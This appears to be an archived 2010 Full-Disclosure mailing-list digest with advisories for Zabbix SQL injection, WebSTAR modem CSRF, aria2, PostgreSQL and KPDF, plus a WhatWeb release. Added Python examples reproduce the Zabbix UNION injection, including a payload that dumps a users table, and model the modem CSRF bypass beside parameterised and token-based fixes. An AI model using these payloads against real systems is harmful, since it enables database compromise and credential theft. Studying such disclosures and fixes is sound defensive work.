Re: [Full-disclosure] Anybody know about "hack0wn" website please let me know

2010-05-24 Thread sunjester
I guess just from poking around the site for several seconds and finding
obvious SQL injections and numerous copy+pasted code, I would say don't use
them lol.

/view.php?xroot=80.0+1&cat=papers

and if they refer to themselves as "Elite h4x0rs", you should probably just
move on to the next site...

-- 
Freelance Web/Desktop Developer
http://fusecurity.com/ | "Free Security Technology"
http://www.rentacoder.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SQL injection vulnerability in Zabbix <= 1.8.1

2010-05-24 Thread David Guimaraes
Product: Zabbix
Vendor: Zabbix SIA
References: http://www.securityfocus.com/bid/39752
http://secunia.com/advisories/39119
Software Link: http://www.zabbix.com/
Vulnerable Version: <= 1.8.1
Vulnerability Type: SQL Injection
Status: Fixed in version 1.8.2
Risk level: Medium
Author: David "skys" Guimaraes (skysbsb[at]gmail.com)
Date: 27/04/2010

Vulnerability Details:
The vulnerability exists due to a failure of the "events.php" script to
properly sanitize user-supplied input in the "nav_time" variable. An
attacker can execute arbitrary queries against the database, compromise
the application or exploit various vulnerabilities in the underlying SQL
database.

An attacker can exploit this vulnerability using only a browser. The
following PoC is available:
http://vulnsite.com/path_to_zabbix/events.php?nav_time=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7+from+events+where+(testvalue)--

Positive response page contains: "\"info\">1"

--
David "skys" Guimaraes

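The following is an added illustration of the bug class behind the advisory above; it is not Zabbix code. A request parameter is spliced into SQL text and run against an in-memory SQLite database, beside a version that type-checks and binds the value. The table layout, the rows and the password hash are constructed for the example and only stand in for the real Zabbix schema; the payloads are adapted from the advisory's PoC with the column count matched to the example query.

```python
"""Added illustration (not Zabbix code) of a request parameter spliced into
SQL text, shown beside a parameterised version. Schema and rows are
constructed here; payloads follow the shape of the advisory's PoC."""
import sqlite3

# Hypothetical stand-in for the real Zabbix tables.
SCHEMA = """
CREATE TABLE events (eventid INTEGER, objectid INTEGER, clock INTEGER, value INTEGER);
CREATE TABLE users  (userid INTEGER, alias TEXT, passwd TEXT);
INSERT INTO events VALUES (1, 100, 1274650000, 1), (2, 101, 1274660000, 0);
INSERT INTO users  VALUES (1, 'Admin', '5fce1b3e34b520afeffb37ce08c7cd66');
"""

def query_vulnerable(conn, nav_time):
    """nav_time is concatenated into the statement exactly as received."""
    sql = ("SELECT eventid, objectid, clock, value FROM events "
           "WHERE clock <= " + str(nav_time) + " ORDER BY clock DESC")
    return conn.execute(sql).fetchall()

def query_fixed(conn, nav_time):
    """Type-check first, then bind: the value can never become SQL syntax."""
    nav_time = int(nav_time)            # ValueError for anything but an integer literal
    sql = ("SELECT eventid, objectid, clock, value FROM events "
           "WHERE clock <= ? ORDER BY clock DESC")
    return conn.execute(sql, (nav_time,)).fetchall()

# Payloads in the shape of the advisory's PoC. The trailing '--' comments
# out the application's own ORDER BY clause.
BOOLEAN_TRUE  = "-1 UNION ALL SELECT 1,2,3,4 FROM events WHERE (1=1)--"
BOOLEAN_FALSE = "-1 UNION ALL SELECT 1,2,3,4 FROM events WHERE (1=2)--"
DUMP_USERS    = "-1 UNION ALL SELECT userid, alias, passwd, 4 FROM users--"

def run_probe(query_fn, nav_time):
    """Run one query function against a fresh in-memory database.
    Returns the rows, or None when the input was rejected before reaching SQL."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    try:
        return query_fn(conn, nav_time)
    except ValueError:
        return None
    finally:
        conn.close()

if __name__ == "__main__":
    for label, payload in (("true", BOOLEAN_TRUE), ("false", BOOLEAN_FALSE),
                           ("dump", DUMP_USERS)):
        print(label, "vulnerable:", run_probe(query_vulnerable, payload),
              "fixed:", run_probe(query_fixed, payload))
```

The boolean pair reproduces the advisory's blind test: with the concatenated query the "true" payload returns rows and the "false" one returns none, which is the signal a scanner keys on (the advisory's `"info">1` marker is the rendered equivalent). The `DUMP_USERS` payload shows why a UNION in a read-only page is still a full compromise. Binding alone is enough here, but the `int()` check also gives a place to log and reject the attempt before it touches the database.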


[Full-disclosure] Scientific Atlanta DPC2100 WebSTAR Cable Modem vulnerabilities

2010-05-24 Thread Dan Rosenberg
===
Scientific Atlanta DPC2100 Cable Modem
Cross-Site Request Forgery and Insufficient Authentication
May 24, 2010
CVE-2010-2025, CVE-2010-2026
===

==Description==

Scientific Atlanta, a Cisco company (www.cisco.com), produces the WebSTAR line
of cable modems, which are widely deployed by cable providers, especially for
home usage.  Certain versions of the firmware for the DPC2100 model feature a
web interface that is vulnerable to the following issues.  Testing was
performed on a DPC2100R2 modem, with firmware v2.0.2r1256-060303.  Other
WebSTAR modems and firmware versions may be vulnerable as well.

1. Cross-site request forgery (CSRF).  Several features provided by the web
interface fail to properly establish sessions that restrict access to
authorized users, including forms for changing the administrative password,
resetting the modem, and installing new firmware.  An attacker may create a
malicious website that, when visited by a victim, updates these settings on the
victim's modem on the victim's behalf without their authorization or need for
any additional user interaction.  This can be used to deny service by resetting
the modem or wiping the firmware, to change the default administrative
password, or potentially to steal information from the victim by installing
malicious firmware.  This issue has been assigned CVE-2010-2025.

2. Insufficient authentication.  The modem's access control scheme, which has
levels numbered from 0-2 (or 0-3 on some other models), is not properly checked
before performing operations that should require authentication, including
resetting the modem and installing new firmware.  The modem requires the proper
access level to access web interface pages containing forms that allow a user
to perform these actions, but does not properly authenticate the pages that
actually carry out these actions.  By sending a POST request directly to these
pages, these actions may be performed without any authentication.  Attacks may
be performed by an attacker on the local network or by leveraging the CSRF
vulnerability.  This issue has been assigned CVE-2010-2026.

==Identifying Vulnerable Installations==

Most home installations of this modem will feature a web interface that is
accessible at "http://192.168.100.1".  The following proof-of-concept code may
be used to test for vulnerability.  It leverages the CSRF vulnerability to
change the access level of your modem to the most restrictive settings (a
harmless action).  If your modem is vulnerable, then you will be presented with
a message stating that your settings have been successfully updated.  If you
are greeted with a page stating there was a "Password confirmation error", then
your modem password has been changed from the default but you are still
vulnerable.  If you are greeted with an HTTP authentication form or other
message, then your model is not vulnerable.



Test for CSRF vulnerability in WebSTAR modems




http://192.168.100.1/goform/_aslvl";>




document.csrf.submit()




==Solution==

In most cases, home users will be unable to update vulnerable firmware without
assistance from their cable providers.  If your firmware is vulnerable, contact
your cable provider and request a firmware update to the latest version.  For
the DPC2100R2 modems, the latest version string is
dpc2100R2-v202r1256-100324as.

To prevent exploitation of CSRF vulnerabilities, users are always encouraged
to practice safe browsing habits and avoid visiting unknown or untrusted
websites.

==Credits==

These vulnerabilities were discovered by Dan Rosenberg
(dan.j.rosenb...@gmail.com).

Thanks to Matthew Bergin for suggesting I should look at cable modems.

==Timeline==

1/26/10 - Vulnerability reported to Cisco
1/26/10 - Response, issue assigned internal tracking number
2/26/10 - Status update requested
2/26/10 - Response
5/15/10 - Status update requested
5/17/10 - Response, confirmation that newest firmware resolves issues
5/17/10 - Disclosure date set
5/24/10 - Disclosure

==References==

CVE identifiers CVE-2010-2025 and CVE-2010-2026 have been assigned to these
issues.

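The two defects described in the advisory above are easy to conflate, so here is an added model of them, written for this page and not taken from the modem firmware: three request dispatchers for an imaginary `/goform/_aslvl` handler (the path comes from the PoC; the access levels follow the 0-2 scheme the advisory describes; the session store, the page names and the token scheme are hypothetical). The first gates only the pages that display forms, as reported. The second adds the missing level check on the action handler, which stops the direct-POST bypass but not CSRF, because a victim's browser attaches the session cookie to a forged request too. The third also requires a session-bound token and, where the browser sends one, a matching Origin.

```python
"""Added model (not firmware code) of: (1) authorisation enforced on the page
that shows a form but not on the handler that acts on its POST, and (2) no
session binding on state-changing requests. Paths, levels, session store
and token scheme are hypothetical."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

MODEM_ORIGIN = "http://192.168.100.1"   # default address from the advisory
ADMIN = 2                               # highest of the 0-2 levels described

# Hypothetical mapping of page / action handler -> minimum access level.
REQUIRED_LEVEL = {
    "/_aslvl.html": ADMIN,              # page that shows the access-level form
    "/goform/_aslvl": ADMIN,            # handler the form posts to (path from the PoC)
    "/goform/reset": ADMIN,
    "/goform/firmware": ADMIN,
}

SESSIONS = {}                           # cookie value -> access level (in-memory)
SERVER_SECRET = secrets.token_bytes(32)

@dataclass
class Request:
    method: str
    path: str
    cookie: str = ""                    # attached by the browser, even cross-site
    origin: str = ""                    # Origin header; absent on many 2010 browsers
    form: dict = field(default_factory=dict)

def login(level):
    cookie = secrets.token_hex(16)
    SESSIONS[cookie] = level
    return cookie

def csrf_token(cookie):
    """Token bound to the session: a forger who lacks the cookie cannot compute it."""
    return hmac.new(SERVER_SECRET, cookie.encode(), hashlib.sha256).hexdigest()

def vulnerable_dispatch(req):
    """Reported behaviour: pages are gated, action handlers are not."""
    level = SESSIONS.get(req.cookie, 0)
    if req.method == "GET" and level < REQUIRED_LEVEL.get(req.path, 0):
        return 401, "Authentication required"
    if req.method == "POST" and req.path.startswith("/goform/"):
        return 200, "Settings updated"  # no level check, no session binding
    return 200, "ok"

def auth_only_dispatch(req):
    """Fixes the direct-POST bypass only; a forged request still carries the
    victim's cookie, so CSRF keeps working."""
    level = SESSIONS.get(req.cookie, 0)
    if level < REQUIRED_LEVEL.get(req.path, 0):
        return 401, "Authentication required"
    if req.method == "POST":
        return 200, "Settings updated"
    return 200, "ok"

def fixed_dispatch(req):
    """Level checked on every request; state changes need a session-bound token
    and, when the browser sends one, an Origin matching the modem."""
    level = SESSIONS.get(req.cookie, 0)
    if level < REQUIRED_LEVEL.get(req.path, 0):
        return 401, "Authentication required"
    if req.method == "POST":
        if req.origin and req.origin != MODEM_ORIGIN:
            return 403, "Cross-origin request rejected"
        supplied = req.form.get("csrf_token", "")
        if not hmac.compare_digest(supplied, csrf_token(req.cookie)):
            return 403, "Missing or invalid CSRF token"
        return 200, "Settings updated"
    return 200, "ok"

def run_scenarios():
    """Status each dispatcher returns for three POSTs to /goform/_aslvl."""
    victim = login(ADMIN)
    lan_attacker = Request("POST", "/goform/_aslvl")                  # no session
    forged = Request("POST", "/goform/_aslvl", cookie=victim,
                     origin="http://attacker.example")                # CSRF page
    legit = Request("POST", "/goform/_aslvl", cookie=victim, origin=MODEM_ORIGIN,
                    form={"csrf_token": csrf_token(victim)})
    out = {}
    for name, fn in (("vulnerable", vulnerable_dispatch),
                     ("auth_only", auth_only_dispatch),
                     ("fixed", fixed_dispatch)):
        out[name] = {"direct": fn(lan_attacker)[0],
                     "csrf": fn(forged)[0],
                     "legit": fn(legit)[0]}
    return out

if __name__ == "__main__":
    for name, statuses in run_scenarios().items():
        print("%-11s %s" % (name, statuses))
```

The middle dispatcher is the point: checking the session on the handler closes CVE-2010-2026 but leaves CVE-2010-2025 intact, which is why the advisory can only tell home users to avoid untrusted sites until the firmware itself binds each state-changing request to the session.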


[Full-disclosure] [ MDVSA-2010:106 ] aria2

2010-05-24 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:106
 http://www.mandriva.com/security/
 ___

 Package : aria2
 Date: May 24, 2010
 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered in aria2 which allows remote attackers
 to create arbitrary files via directory traversal sequences in the
 name attribute of a file element in a metalink file (CVE-2010-1512).
 
 This update fixes this issue.
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program.
 Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1512
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 5ea05c2ad0ae20f6e6ec2407d7ec687c  2009.0/i586/aria2-0.15.3-0.20080918.3.2mdv2009.0.i586.rpm
 23fe7be66e5ab872ecd529d6b4adb333  2009.0/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 7aef880fdb7cf05f04d3e5ffec5a88b4  2009.0/x86_64/aria2-0.15.3-0.20080918.3.2mdv2009.0.x86_64.rpm
 23fe7be66e5ab872ecd529d6b4adb333  2009.0/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 defb85a38a22de997415c21d06e4a98f  2009.1/i586/aria2-1.2.0-0.20090201.5.3mdv2009.1.i586.rpm
 604a90cb5d6c306c86a6d0eb9b408400  2009.1/SRPMS/aria2-1.2.0-0.20090201.5.3mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 3438511cfd153c536d867bbfc0f77c28  2009.1/x86_64/aria2-1.2.0-0.20090201.5.3mdv2009.1.x86_64.rpm
 604a90cb5d6c306c86a6d0eb9b408400  2009.1/SRPMS/aria2-1.2.0-0.20090201.5.3mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 36bc7a159d8c274e43a6ba0b9b5bd5cf  2010.0/i586/aria2-1.6.2-1.4mdv2010.0.i586.rpm
 8750b5dc33e770d1c482a0816a6c117e  2010.0/SRPMS/aria2-1.6.2-1.4mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 19a28817e1009d43272161f72bdc1148  2010.0/x86_64/aria2-1.6.2-1.4mdv2010.0.x86_64.rpm
 8750b5dc33e770d1c482a0816a6c117e  2010.0/SRPMS/aria2-1.6.2-1.4mdv2010.0.src.rpm

 Mandriva Enterprise Server 5:
 44ff68b509e581bd4b7bccbb219b7d8d  mes5/i586/aria2-0.15.3-0.20080918.3.2mdvmes5.1.i586.rpm
 378aa9a1713fe97bf4ad025b38a68c3b  mes5/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 bd717edf887ab38d2e05e0b407eaa6bb  mes5/x86_64/aria2-0.15.3-0.20080918.3.2mdvmes5.1.x86_64.rpm
 378aa9a1713fe97bf4ad025b38a68c3b  mes5/SRPMS/aria2-0.15.3-0.20080918.3.2mdv2009.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFL+oPRmqjQ0CJFipgRAgK9AJ0dOVRUicAJZoXYE2Jmk+uMAIc/CACg9NAv
OAZKpqeq6/usZzsSOhC0KRo=
=+ClR
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2051-1] New postgresql-8.3 packages fix several vulnerabilities

2010-05-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2051-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
May 24, 2010  http://www.debian.org/security/faq
- 

Package: postgresql-8.3
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2010-0442 CVE-2010-1169 CVE-2010-1170 CVE-2010-1975 

Several local vulnerabilities have been discovered in PostgreSQL, an
object-relational SQL database. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2010-1169

Tim Bunce discovered that the implementation of the procedural
language PL/Perl insufficiently restricts the subset of allowed
code, which allows authenticated users the execution of arbitrary
Perl code.

CVE-2010-1170

Tom Lane discovered that the implementation of the procedural
language PL/Tcl insufficiently restricts the subset of allowed
code, which allows authenticated users the execution of arbitrary
Tcl code.

CVE-2010-1975

It was discovered that an unprivileged user could reset
superuser-only parameter settings.

For the stable distribution (lenny), these problems have been fixed in
version 8.3.11-0lenny1. This update also introduces a fix for 
CVE-2010-0442, which was originally scheduled for the next Lenny point
update.

For the unstable distribution (sid), these problems have been fixed in
version 8.4.4-1 of postgresql-8.4.

We recommend that you upgrade your postgresql-8.3 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11.orig.tar.gz
    Size/MD5 checksum: 13913683 02472af037929fe30405d1497f07421d
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11-0lenny1.diff.gz
    Size/MD5 checksum:    50334 717569100b751cfc3c18ca82b70fd0f4
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.11-0lenny1.dsc
    Size/MD5 checksum:     1673 725fcd67e1b92cc9bd9f78c9aefa1d83

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.11-0lenny1_all.deb
    Size/MD5 checksum:   263636 9dd154ff43d8dd67cbc9e92a91156362
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.11-0lenny1_all.deb
    Size/MD5 checksum:   263608 ef90b5f536cff943601e3b12f42f18c7
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.11-0lenny1_all.deb
    Size/MD5 checksum:   263506 f5c5e8f917b6275b9a25d5c4abf5a1f7
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.11-0lenny1_all.deb
    Size/MD5 checksum:  2194706 0cf86f435601423485565bc69e53c837
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.11-0lenny1_all.deb
    Size/MD5 checksum:   263450 1605ce58c660805db2cf8856ec416d2d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   833060 cf22e01a9227a279be3d5338328d9f4e
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   485598 ba9abe30da3eac9f42e927314c010633
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   292830 fc0a66d65d86b50de0f1fa9dc1964e6b
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   282624 839273128e95d0687daaf569abcef024
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   292710 906574dc9d5dc2b64e5bcb4b2f81d841
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   292084 315ceae207f68f94b2afcf48c618de7c
  http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.11-0lenny1_alpha.deb
    Size/MD5 checksum:   629712 

[Full-disclosure] [SECURITY] [DSA 2050-1] New kdegraphics packages fix several vulnerabilities

2010-05-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2050-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
May 24, 2010  http://www.debian.org/security/faq
- 

Package: kdegraphics
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2009-1188 CVE-2009-3603 CVE-2009-3604 CVE-2009-3606 
CVE-2009-3608 CVE-2009-3609

Several local vulnerabilities have been discovered in KPDF, a PDF viewer
for KDE, which allow the execution of arbitrary code or denial of 
service if a user is tricked into opening a crafted PDF document.

For the stable distribution (lenny), these problems have been fixed in
version 4:3.5.9-3+lenny3.

The unstable distribution (sid) no longer contains kpdf. Its replacement,
Okular, links against the poppler PDF library.

We recommend that you upgrade your kdegraphics packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3.diff.gz
    Size/MD5 checksum:   331735 eb19c67b63df9bea8113c6ce0570f99b
  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3.dsc
    Size/MD5 checksum:     2100 4332314f48c3583068f8a4144d4c1e4d
  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9.orig.tar.gz
    Size/MD5 checksum:  9058343 d66472f22db2dc5b706ed4f52d9b16f5

Architecture independent packages:

  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny3_all.deb
    Size/MD5 checksum:    14088 db2f2157980256b214726dd8d285cf9c
  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-doc-html_3.5.9-3+lenny3_all.deb
    Size/MD5 checksum:   146838 f3b12df069df5e721bbae57fe4a0fb10

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:  1426340 d87a0e5f0442b7fc64dc31d27be094b2
  http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   507416 f4b8e0f7d541a103209d9e78aad3019c
  http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:  2414178 164a5f542ca883185f83b28ce96a8215
  http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   331616 495d561d9ad550890dbac900c114aa8d
  http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:    62098 0147890917b354e67765f26f70515690
  http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   147112 b10356b326bd4b40ca61edbeac8a2367
  http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:  1136886 6fb9148b54b3227df55204c5f278f6a7
  http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   252536 39ea86786322108507e7517595d5f315
  http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   110180 3051edb3012f0959eaa99356234ecefd
  http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   445578 fe3a6bce17c1aebc0d6b13ff18cc3e9e
  http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   547246 8a6cd8c49cfe527f3e7ab27294d8895d
  http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   113248 4cffc9361cd05d4bc35af2173a0bec36
  http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   772790 e8eff7f950f54450e2f0e6cbbdd8d34a
  http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny3_alpha.deb
    Size/MD5 checksum:   902622 42ab9a2b41f0288cfb9fef469b9a3194
  http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.

[Full-disclosure] WhatWeb version 0.4.3 released

2010-05-24 Thread Andrew Horton
I've just released a new version of WhatWeb with new features and plugins.


You can read more and download it from 
http://www.morningstarsecurity.com/research/whatweb

DESCRIPTION

Identify content management systems (CMS), blogging platforms,
stats/analytics packages, javascript libraries, servers and more. When you
visit a website in your browser the transaction includes many unseen hints
about how the webserver is set up and what software is delivering the
webpage. Some of these hints are obvious, eg. "Powered by XYZ" and others
are more subtle. WhatWeb recognises these hints and reports what it finds.

WhatWeb has over 90 plugins and needs community support to develop more.
Plugins can identify systems with obvious identifying hints removed by also
looking for subtle clues. For example, a WordPress site might remove the
tag but the WordPress plugin also looks for "wp-content" which is less easy
to disguise. Plugins are flexible and can return any datatype, for example
plugins can return version numbers, email addresses, account ID's and more.

There are both passive and aggressive plugins, passive plugins use
information on the page, in cookies and in the URL to identify the system.
A passive request is as light weight as a simple GET / HTTP/1.1 request.
Aggressive plugins guess URLs and request more files. Plugins are easy to
write, you don't need to know ruby to make them.



CHANGES

Version 0.4.3 Released May 24th 2010

* Added GPLv2 notices
* Added Makefile (Thanks Michal Ambroz)
* Added man pages (Thanks Michal Ambroz)
* Added --version
* Added invalid command line argument handling
* Added @cookie variable to plugins, but it is not available for recursive use
* Changed output colour of page titles
* Changed plugin names to use a CamelCase convention
* Merged the google analytics GA and Urchin plugins
* Modified MovableType plugin
* Added Cookie names plugin
* Added Concrete5 CMS plugin
* Added CushyCMS plugin
* Added FrogCMS plugin
* Added ModxCMS plugin
* Added TypoLight plugin
* Added ExpressionEngine plugin
* Fixed a bug in Tomcat plugin
* New feature, my-plugins/ folder. Keep your personal plugins separate.
* Usage info shows correct defaults
* Fixed a bug where aggressive plugins didn't use the proxy settings
* Added XML (naive) logging
* Updated usage to show how to pipe HTML to /dev/stdin
* Added --no-redirect option. Do not follow HTTP 3xx redirects

Homepage: http://www.morningstarsecurity.com/research/whatweb

-- 
Cheers,

Andrew Horton

MorningStar Security
Mobile +64 (0) 272 646 959
Web www.morningstarsecurity.com

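To make the passive-plugin idea from the announcement above concrete, here is an added Python sketch of the same approach. It is not a WhatWeb plugin (WhatWeb is written in Ruby) and not the project's code; the HTTP response it inspects is constructed in the script rather than captured from a site, and the plugin table is a hypothetical handful of patterns. It shows the point the announcement makes: the sample page has had its WordPress generator meta tag removed, yet "wp-content", "wp-includes" and the WordPress cookie name still give it away, all from a single GET.

```python
"""Added illustration of passive fingerprinting over one HTTP response.
Not a WhatWeb plugin; the response and the pattern table are constructed."""
import re

# Constructed sample: a WordPress front page whose generator meta tag has been
# removed, served by Apache/PHP and setting the WordPress test cookie.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.14 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.2\r\n"
    "Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><head><title>Example blog</title>\n"
    "<link rel='stylesheet' href='/wp-content/themes/twentyten/style.css' />\n"
    "<script src='/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>\n"
    "</head><body><p>Hello world</p></body></html>"
)

# Hypothetical plugin table: name -> list of (where, header-name, regex).
# A capture group, when present, is reported as the version.
PLUGINS = {
    "Apache": [("header", "Server", r"\bApache(?:/([\d.]+))?")],
    "PHP": [("header", "X-Powered-By", r"\bPHP/([\d.]+)")],
    "WordPress": [
        ("body", None, r'<meta name="generator" content="WordPress ([\d.]+)"'),
        ("body", None, r"/wp-content/"),        # survives removal of the meta tag
        ("body", None, r"/wp-includes/"),
        ("cookie", None, r"^wordpress_"),
    ],
    "jQuery": [("body", None, r"jquery(?:\.min)?\.js\?ver=([\d.]+)")],
}

def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status line, headers, cookie names, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    cookies = [c.partition("=")[0].strip() for c in headers.get("set-cookie", [])]
    return lines[0], headers, cookies, body

def fingerprint(raw):
    """Run every plugin's checks over one response; returns name -> hits/version."""
    _status, headers, cookies, body = parse_response(raw)
    results = {}
    for name, checks in PLUGINS.items():
        hits, version = 0, None
        for where, header, pattern in checks:
            if where == "header":
                targets = headers.get(header.lower(), [])
            elif where == "cookie":
                targets = cookies
            else:
                targets = [body]
            for text in targets:
                m = re.search(pattern, text, re.IGNORECASE)
                if m:
                    hits += 1
                    if version is None and m.groups() and m.group(1):
                        version = m.group(1)
                    break
        if hits:
            results[name] = {"matches": hits, "version": version}
    return results

if __name__ == "__main__":
    for name, info in fingerprint(SAMPLE_RESPONSE).items():
        print("%-10s matches=%d version=%s" % (name, info["matches"], info["version"]))
```

Everything here is passive in the announcement's sense: one response, no guessed URLs. An aggressive check for the same target would request paths such as `/wp-login.php` and count the responses, which is noisier in the target's logs and is the trade-off the announcement's passive/aggressive split encodes.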


Re: [Full-disclosure] Anybody know about 'hack0wn' website please let me know

2010-05-24 Thread Juha-Matti Laurio
The Exploit Database
http://www.exploit-db.com/

maintained by Offensive Security is updated on a daily basis.

Juha-Matti

rajendra prasad [rajendra.paln...@gmail.com] wrote: 
> Hi List,
> 
> I am searching for a good website for tracking vulnerabilities and
